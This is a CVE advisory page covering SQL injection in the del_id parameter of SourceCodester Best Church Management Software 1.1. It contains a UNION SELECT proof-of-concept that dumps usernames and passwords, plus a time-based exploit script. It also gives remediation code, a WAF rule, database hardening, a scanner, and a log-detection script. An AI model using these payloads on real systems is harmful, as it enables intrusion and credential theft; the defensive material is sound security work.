How CVE-2025-1200 Works
The vulnerability exists in the `/admin/app/slider_crud.php` file of SourceCodester Best Church Management Software 1.1. The `del_id` parameter is not sanitized before it is concatenated into a SQL query, so an attacker can inject SQL through it. When a crafted payload is passed in `del_id`, the application executes it directly on the database server, which enables unauthorized data access, modification, or deletion. The attack can be performed remotely and without authentication because input validation is insufficient and the query is not built with prepared statements.
DailyCVE Form
Platform: SourceCodester
Version: 1.1
Vulnerability: SQL Injection
Severity: Critical
Date: 04/30/2025
What Undercode Says:
```text
-- Exploit PoC
/admin/app/slider_crud.php?del_id=1' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password),7,8 FROM users-- -
```
```python
# Automated Exploit Script
import requests

target = "http://target.com/admin/app/slider_crud.php"
payload = "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--"
response = requests.get(target, params={"del_id": payload})
if response.elapsed.total_seconds() >= 5:
    print("Vulnerable to SQLi")
```
```php
// Protection Code
// del_id is a numeric id: cast it and bind it as an integer instead of
// escaping a string and interpolating it into the query.
$del_id = (int) $_GET['del_id'];
$stmt = $conn->prepare("DELETE FROM sliders WHERE id = ?");
if ($stmt === false) {
    throw new RuntimeException("prepare failed: " . $conn->error);
}
$stmt->bind_param("i", $del_id);
$stmt->execute();
```
```text
# WAF Rule to Block Exploits (ModSecurity)
SecRule ARGS:del_id "@detectSQLi" "id:1001,phase:2,deny,status:403,log,msg:'SQLi Attempt'"
```
```sql
-- Database Hardening
REVOKE ALL PRIVILEGES ON church_db.* FROM 'webuser'@'%';
GRANT SELECT ON church_db.* TO 'webuser'@'%';
-- Note: the slider_crud.php DELETE shown above still needs DELETE on church_db.sliders;
-- grant the application account only the statements each table actually requires.
```
```python
# Vulnerability Scanner
import requests

def check_sqli(url):
    # Error-based probe: a stray quote or boolean fragment in del_id that
    # surfaces a MySQL error message indicates unparameterized query building.
    test_payloads = ["1'", "1 AND 1=1", "1 AND 1=2"]
    for payload in test_payloads:
        # params= URL-encodes the payload; raw string concatenation did not.
        r = requests.get(url, params={"del_id": payload}, timeout=10)
        if "error in your SQL" in r.text:
            return True
    return False
```
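A log-side counterpart to the WAF rule above, added here as an example that is not part of the original advisory: it scans web-server access logs for requests to the vulnerable endpoint whose `del_id` is anything other than a bare integer and tags the payload shapes this page shows (UNION SELECT, SLEEP, comment terminators). The log lines, IP addresses and marker names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

TARGET_PATH = "/admin/app/slider_crud.php"  # endpoint named in the advisory
# Markers taken from the payload shapes shown on this page; matching runs on
# the URL-decoded, lower-cased parameter value.
SQLI_MARKERS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.S),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "comment_terminator": re.compile(r"(--|#|/\*)"),
    "quote_break": re.compile(r"['\"]"),
}
# Combined log format (Apache/nginx); only the request line is used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def classify_del_id(value):
    """Marker names that fire on a del_id value (empty list = benign). A real
    del_id is a bare integer; decoding once more also catches double encoding."""
    decoded = unquote_plus(value).strip().lower()
    if decoded.isdigit():
        return []
    hits = [name for name, rx in SQLI_MARKERS.items() if rx.search(decoded)]
    return hits or ["non_numeric"]

def scan_access_log(lines):
    """Return (ip, timestamp, decoded del_id, markers) for suspicious requests
    to the vulnerable endpoint; other paths are ignored."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        if url.path != TARGET_PATH:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("del_id", []):
            markers = classify_del_id(value)
            if markers:
                findings.append((m["ip"], m["ts"], unquote_plus(value), markers))
    return findings

# Constructed sample lines, not real traffic; payload shapes mirror the PoCs above.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Apr/2025:10:01:02 +0000] "GET /admin/app/slider_crud.php?del_id=7 HTTP/1.1" 200 512',
    '203.0.113.9 - - [30/Apr/2025:10:02:44 +0000] "GET /admin/app/slider_crud.php?del_id=1%27%20UNION%20SELECT%201,2,3%20FROM%20users--%20- HTTP/1.1" 200 2048',
    '203.0.113.9 - - [30/Apr/2025:10:03:10 +0000] "GET /admin/app/slider_crud.php?del_id=1%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)-- HTTP/1.1" 200 512',
    '198.51.100.2 - - [30/Apr/2025:10:04:00 +0000] "GET /index.php?del_id=1%27 HTTP/1.1" 404 200',
]
```

Run `scan_access_log` over a real access log to get one finding per offending request; pairing it with the 403 status the WAF rule returns tells you whether the block actually fired.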
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode